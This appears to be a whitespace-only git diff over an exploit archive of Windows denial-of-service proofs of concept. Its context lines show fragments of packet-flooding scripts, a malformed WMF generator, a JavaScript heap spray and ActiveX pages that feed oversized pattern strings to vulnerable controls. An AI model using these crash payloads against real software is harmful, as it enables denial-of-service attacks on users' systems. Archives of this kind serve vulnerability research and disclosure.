No newline at end of file diff --git a/platforms/windows/dos/30761.html b/platforms/windows/dos/30761.html index 1c23424d1..4025368f5 100755 --- a/platforms/windows/dos/30761.html +++ b/platforms/windows/dos/30761.html @@ -19,4 +19,4 @@ Attackers can exploit these issues to crash applications that use the ActiveX co </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/3078.pl b/platforms/windows/dos/3078.pl index 40e03091e..81458952e 100755 --- a/platforms/windows/dos/3078.pl +++ b/platforms/windows/dos/3078.pl @@ -79,4 +79,4 @@ for(my $foo = 0; $foo < $packetz; $foo++){ print "[+] $packetz malformed packetz sent ];D\n\n"; print "[+] Acunetix WVS! killed ! ;)\n\n"; -# milw0rm.com [2007-01-04] +# milw0rm.com [2007-01-04] \ No newline at end of file diff --git a/platforms/windows/dos/30797.html b/platforms/windows/dos/30797.html index 24fbc5a19..eabf90c0d 100755 --- a/platforms/windows/dos/30797.html +++ b/platforms/windows/dos/30797.html @@ -26,4 +26,4 @@ UPDATE (November 26, 2007): Reports indicate that this issue occurs because of a </head> <body onload="JavaScript: return Check();"> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/30805.html b/platforms/windows/dos/30805.html index 2f5680003..02ca93104 100755 --- a/platforms/windows/dos/30805.html +++ b/platforms/windows/dos/30805.html @@ -27,4 +27,4 @@ Note that RichFX Player ActiveX Control is installed by default with RealNetwork <body onload="JavaScript: return Check();"> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/30812.html b/platforms/windows/dos/30812.html index 975679897..06e375453 100755 --- a/platforms/windows/dos/30812.html +++ b/platforms/windows/dos/30812.html @@ -33,5 +33,4 @@ written by e.b. </head> <body onload="JavaScript: return Check();"> - </body> - + </body> \ No newline at end of file diff --git a/platforms/windows/dos/30825.html b/platforms/windows/dos/30825.html index 2031607f1..2bf3de68c 100755 --- a/platforms/windows/dos/30825.html +++ b/platforms/windows/dos/30825.html @@ -25,4 +25,4 @@ obj.StoreLicense(x); classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}"> </object> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/30936.html b/platforms/windows/dos/30936.html index e90004c67..861eb4599 100755 --- a/platforms/windows/dos/30936.html +++ b/platforms/windows/dos/30936.html @@ -36,5 +36,4 @@ AOL Picture Editor 'YGPPicEdit.dll' 9.5.1.8 is vulnerable; other versions may al <object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309"> </object> </body> -</html> - +</html> \ No newline at end of file diff --git a/platforms/windows/dos/31014.py b/platforms/windows/dos/31014.py index 1d8f59646..bda24c3a1 100755 --- a/platforms/windows/dos/31014.py +++ b/platforms/windows/dos/31014.py @@ -23,4 +23,4 @@ print data except: -print "DNS server is Down!" +print "DNS server is Down!" \ No newline at end of file diff --git a/platforms/windows/dos/31105.py b/platforms/windows/dos/31105.py index 0b6bc6a27..eba3bf993 100755 --- a/platforms/windows/dos/31105.py +++ b/platforms/windows/dos/31105.py @@ -38,5 +38,4 @@ s.close() be safe, -j0rgan - +j0rgan \ No newline at end of file diff --git a/platforms/windows/dos/3111.pl b/platforms/windows/dos/3111.pl index daf8a8bc9..f66928f08 100755 --- a/platforms/windows/dos/3111.pl +++ b/platforms/windows/dos/3111.pl @@ -11,4 +11,4 @@ print WMF "\x00\x00\x00\x00"; close(WMF); print "ok\n\nnow try to browse folder in XP explorer and wait :)\n"; -# milw0rm.com [2007-01-13] +# milw0rm.com [2007-01-13] \ No newline at end of file diff --git a/platforms/windows/dos/31114.txt b/platforms/windows/dos/31114.txt index 48b3a31dd..e9749960b 100755 --- a/platforms/windows/dos/31114.txt +++ b/platforms/windows/dos/31114.txt @@ -22,4 +22,4 @@ function heapspray(shellcode) { heapspray(unescape(“%ucccc%ucccc”)); Collab.collectEmailInfo({ - msg:repeat(4096, unescape("%u0909%u0909"))}); + msg:repeat(4096, unescape("%u0909%u0909"))}); \ No newline at end of file diff --git a/platforms/windows/dos/3112.py b/platforms/windows/dos/3112.py index af7c09e0f..5cf35060d 100755 --- a/platforms/windows/dos/3112.py +++ b/platforms/windows/dos/3112.py @@ -29,4 +29,4 @@ print "disconnecting." s.close() -# milw0rm.com [2007-01-10] +# milw0rm.com [2007-01-10] \ No newline at end of file diff --git a/platforms/windows/dos/31168.pl b/platforms/windows/dos/31168.pl index 8f449b2f0..f68ac5e66 100755 --- a/platforms/windows/dos/31168.pl +++ b/platforms/windows/dos/31168.pl @@ -104,4 +104,4 @@ $load = "<?xml version=\"1.0\"?>\<ExpressBurnProject type=\"0\"><Alb". open fp, ">./$file" || die "\n[-] Can't open $file: $!\n\n"; print fp $load; close fp; print "\n\x20\x20\x19 File created successfully: $file "; - $file = -s $file; print "($file bytes)\n\n\n"; + $file = -s $file; print "($file bytes)\n\n\n"; \ No newline at end of file diff --git a/platforms/windows/dos/31176.html b/platforms/windows/dos/31176.html index dbbe5b6f6..4c948e8a8 100755 --- a/platforms/windows/dos/31176.html +++ b/platforms/windows/dos/31176.html @@ -34,4 +34,4 @@ Language : not found --> <object id=TestObj classid="CLSID:{F359732D-D020-40ED-83FF-F381EFE36B54}" style="width:100;height:350"> <PARAM NAME="Data" VALUE="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy7Gy8Gy9Gz0Gz1Gz2Gz3Gz4Gz5Gz6Gz7Gz8Gz9Ha0Ha1Ha2Ha3Ha4Ha5Ha6Ha7Ha8Ha9Hb0Hb1Hb2Hb3Hb4Hb5Hb6Hb7Hb8Hb9Hc0Hc1Hc2Hc3Hc4Hc5Hc6Hc7Hc8Hc9Hd0Hd1Hd2Hd3Hd4Hd5Hd6Hd7Hd8Hd9He0He1He2He3He4He5He6He7He8He9Hf0Hf1Hf2Hf3Hf4Hf5Hf6Hf7Hf8Hf9Hg0Hg1Hg2Hg3Hg4Hg5Hg6Hg7Hg8Hg9Hh0Hh1Hh2Hh3Hh4Hh5Hh6Hh7Hh8Hh9Hi0Hi1Hi2Hi3Hi4Hi5Hi6Hi7Hi8Hi9Hj0Hj1Hj2Hj3Hj4Hj5Hj6Hj7Hj8Hj9Hk0Hk1Hk2Hk3Hk4Hk5Hk6Hk7Hk8Hk9Hl0Hl1Hl2Hl3Hl4Hl5Hl6Hl7Hl8Hl9Hm0Hm1Hm2Hm3Hm4Hm5Hm6Hm7Hm8Hm9Hn0Hn1Hn2Hn3Hn4Hn5Hn6Hn7Hn8Hn9Ho0Ho1Ho2Ho3Ho4Ho5Ho6Ho7Ho8Ho9Hp0Hp1Hp2Hp3Hp4Hp5Hp6Hp7Hp8Hp9Hq0Hq1Hq2Hq3Hq4Hq5Hq6Hq7Hq8Hq9Hr0Hr1Hr2Hr3Hr4Hr5Hr6Hr7Hr8Hr9Hs0Hs1Hs2Hs3Hs4Hs5Hs6Hs7Hs8Hs9Ht0Ht1Ht2Ht3Ht4Ht5Ht6Ht7Ht8Ht9Hu0Hu1Hu2Hu3Hu4Hu5Hu6Hu7Hu8Hu9Hv0Hv1Hv2Hv3Hv4Hv5Hv6Hv7Hv8Hv9Hw0Hw1Hw2Hw3Hw4Hw5Hw6Hw7Hw8Hw9Hx0Hx1Hx2Hx3Hx4Hx5Hx6Hx7Hx8Hx9Hy0Hy1Hy2Hy3Hy4Hy5Hy6Hy7Hy8Hy9Hz0Hz1Hz2Hz3Hz4Hz5Hz6Hz7Hz8Hz9Ia0Ia1Ia2Ia3Ia4Ia5Ia6Ia7Ia8Ia9Ib0Ib1Ib2Ib3Ib4Ib5Ib6Ib7Ib8Ib9Ic0Ic1Ic2Ic3Ic4Ic5Ic6Ic7Ic8Ic9Id0Id1Id2Id3Id4Id5Id6Id7Id8Id9Ie0Ie1Ie2Ie3Ie4Ie5Ie6Ie7Ie8Ie9If0If1If2If3If4If5If6If7If8If9Ig0Ig1Ig2Ig3Ig4Ig5Ig6Ig7Ig8Ig9Ih0Ih1Ih2Ih3Ih4Ih5Ih6Ih7Ih8Ih9Ii0Ii1Ii2Ii3Ii4Ii5Ii6Ii7Ii8Ii9Ij0Ij1Ij2Ij3Ij4Ij5Ij6Ij7Ij8Ij9Ik0Ik1Ik2Ik3Ik4Ik5Ik6Ik7Ik8Ik9Il0Il1Il2Il3Il4Il5Il6Il7Il8Il9Im0Im1Im2Im3Im4Im5Im6Im7Im8Im9In0In1In2In3In4In5In6In7In8In9Io0Io1Io2Io3Io4Io5Io6Io7Io8Io9Ip0Ip1Ip2Ip3Ip4Ip5Ip6Ip7Ip8Ip9Iq0Iq1Iq2Iq3Iq4Iq5Iq6Iq7Iq8Iq9Ir0Ir1Ir2Ir3Ir4Ir5Ir6Ir7Ir8Ir9Is0Is1Is2Is3Is4Is5Is6Is7Is8Is9It0It1It2It3It4It5It6It7It8It9Iu0Iu1Iu2Iu3Iu4Iu5Iu6Iu7Iu8Iu9Iv0Iv1Iv2Iv3Iv4Iv5Iv6Iv7Iv8Iv9Iw0Iw1Iw2Iw3Iw4Iw5Iw6Iw7Iw8Iw9Ix0Ix1Ix2Ix3Ix4Ix5Ix6Ix7Ix8Ix9Iy0Iy1Iy2Iy3Iy4Iy5Iy6Iy7Iy8Iy9Iz0Iz1Iz2Iz3Iz4Iz5Iz6Iz7Iz8Iz9Ja0Ja1Ja2Ja3Ja4Ja5Ja6Ja7Ja8Ja9Jb0Jb1Jb2Jb3Jb4Jb5Jb6Jb7Jb8Jb9Jc0Jc1Jc2Jc3Jc4Jc5Jc6Jc7Jc8Jc9Jd0Jd1Jd2Jd3Jd4Jd5Jd6Jd7Jd8Jd9Je0Je1Je2Je3Je4Je5Je6Je7Je8Je9Jf0Jf1Jf2Jf3Jf4Jf5Jf6Jf7Jf8Jf9Jg0Jg1Jg2Jg3Jg4Jg5Jg6Jg7Jg8Jg9Jh0Jh1Jh2Jh3Jh4Jh5Jh6Jh7Jh8Jh9Ji0Ji1Ji2Ji3Ji4Ji5Ji6Ji7Ji8Ji9Jj0Jj1Jj2Jj3Jj4Jj5Jj6Jj7Jj8Jj9Jk0Jk1Jk2Jk3Jk4Jk5Jk6Jk7Jk8Jk9Jl0Jl1Jl2Jl3Jl4Jl5Jl6Jl7Jl8Jl9Jm0Jm1Jm2Jm3Jm4Jm5Jm6Jm7Jm8Jm9Jn0Jn1Jn2Jn3Jn4Jn5Jn6Jn7Jn8Jn9Jo0Jo1Jo2Jo3Jo4Jo5Jo6Jo7Jo8Jo9Jp0Jp1Jp2Jp3Jp4Jp5Jp6Jp7Jp8Jp9Jq0Jq1Jq2Jq3Jq4Jq5Jq6Jq7Jq8Jq9Jr0Jr1Jr2Jr3Jr4Jr5Jr6Jr7Jr8Jr9Js0Js1Js2Js3Js4Js5Js6Js7Js8Js9Jt0Jt1Jt2Jt3Jt4Jt5Jt6Jt7Jt8Jt9Ju0Ju1Ju2Ju3Ju4Ju5Ju6Ju7Ju8Ju9Jv0Jv1Jv2Jv3Jv4Jv5Jv6Jv7Jv8Jv9Jw0Jw1Jw2Jw3Jw4Jw5Jw6Jw7Jw8Jw9Jx0Jx1Jx2Jx3Jx4Jx5Jx6Jx7Jx8Jx9Jy0Jy1Jy2Jy3Jy4Jy5Jy6Jy7Jy8Jy9Jz0Jz1Jz2Jz3Jz4Jz5Jz6Jz7Jz8Jz9Ka0Ka1Ka2Ka3Ka4Ka5Ka6Ka7Ka8Ka9Kb0Kb1Kb2Kb3Kb4Kb5Kb6Kb7Kb8Kb9Kc0Kc1Kc2Kc3Kc4Kc5Kc6Kc7Kc8Kc9Kd0Kd1Kd2Kd3Kd4Kd5Kd6Kd7Kd8Kd9Ke0Ke1Ke2Ke3Ke4Ke5Ke6Ke7Ke8Ke9Kf0Kf1Kf2Kf3Kf4Kf5Kf6Kf7Kf8Kf9Kg0Kg1Kg2Kg3Kg4Kg5Kg6Kg7Kg8Kg9Kh0Kh1Kh2Kh3Kh4Kh5Kh6Kh7Kh8Kh9Ki0Ki1Ki2Ki3Ki4Ki5Ki6Ki7Ki8Ki9Kj0Kj1Kj2Kj3Kj4Kj5Kj6Kj7Kj8Kj9Kk0Kk1Kk2Kk3Kk4Kk5Kk6Kk7Kk8Kk9Kl0Kl1Kl2Kl3Kl4Kl5Kl6Kl7Kl8Kl9Km0Km1Km2Km3Km4Km5Km6Km7Km8Km9Kn0Kn1Kn2Kn3Kn4Kn5Kn6Kn7Kn8Kn9Ko0Ko1Ko2Ko3Ko4Ko5Ko6Ko7Ko8Ko9Kp0Kp1Kp2Kp3Kp4Kp5Kp6Kp7Kp8Kp9Kq0Kq1Kq2Kq3Kq4Kq5Kq6Kq7Kq8Kq9Kr0Kr1Kr2Kr3Kr4Kr5Kr6Kr7Kr8Kr9Ks0Ks1Ks2Ks3Ks4Ks5Ks6Ks7Ks8Ks9Kt0Kt1Kt2Kt3Kt4Kt5Kt6Kt7Kt8Kt9Ku0Ku1Ku2Ku3Ku4Ku5Ku6Ku7Ku8Ku9Kv0Kv1Kv2Kv3Kv4Kv5Kv6Kv7Kv8Kv9Kw0Kw1Kw2Kw3Kw4Kw5Kw6Kw7Kw8Kw9Kx0Kx1Kx2Kx3Kx4Kx5Kx6Kx7Kx8Kx9Ky0Ky1Ky2Ky3Ky4Ky5Ky6Ky7Ky8Ky9Kz0Kz1Kz2Kz3Kz4Kz5Kz6Kz7Kz8Kz9La0La1La2La3La4La5La6La7La8La9Lb0Lb1Lb2Lb3Lb4Lb5Lb6Lb7Lb8Lb9Lc0Lc1Lc2Lc3Lc4Lc5Lc6Lc7Lc8Lc9Ld0Ld1Ld2Ld3Ld4Ld5Ld6Ld7Ld8Ld9Le0Le1Le2Le3Le4Le5Le6Le7Le8Le9Lf0Lf1Lf2Lf3Lf4Lf5Lf6Lf7Lf8Lf9Lg0Lg1Lg2Lg3Lg4Lg5Lg6Lg7Lg8Lg9Lh0Lh1Lh2Lh3Lh4Lh5Lh6Lh7Lh8Lh9Li0Li1Li2Li3Li4Li5Li6Li7Li8Li9Lj0Lj1Lj2Lj3Lj4Lj5Lj6Lj7Lj8Lj9Lk0Lk1Lk2Lk3Lk4Lk5Lk6Lk7Lk8Lk9Ll0Ll1Ll2Ll3Ll4Ll5Ll6Ll7Ll8Ll9Lm0Lm1Lm2Lm3Lm4Lm5Lm6Lm7Lm8Lm9Ln0Ln1Ln2Ln3Ln4Ln5Ln6Ln7Ln8Ln9Lo0Lo1Lo2Lo3Lo4Lo5Lo6Lo7Lo8Lo9Lp0Lp1Lp2Lp3Lp4Lp5Lp6Lp7Lp8Lp9Lq0Lq1Lq2Lq3Lq4Lq5Lq6Lq7Lq8Lq9Lr0Lr1Lr2Lr3Lr4Lr5Lr6Lr7Lr8LrAAAA"> -</object> +</object> \ No newline at end of file diff --git a/platforms/windows/dos/31177.html b/platforms/windows/dos/31177.html index 296859380..2d831ed06 100755 --- a/platforms/windows/dos/31177.html +++ b/platforms/windows/dos/31177.html @@ -47,4 +47,4 @@ Language : not found --> <object id=TestObj classid="CLSID:{DE7DA0B5-7D7B-4CEA-8739-65CF600D511E}" style="width:100;height:350"> <PARAM NAME="Data" VALUE="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx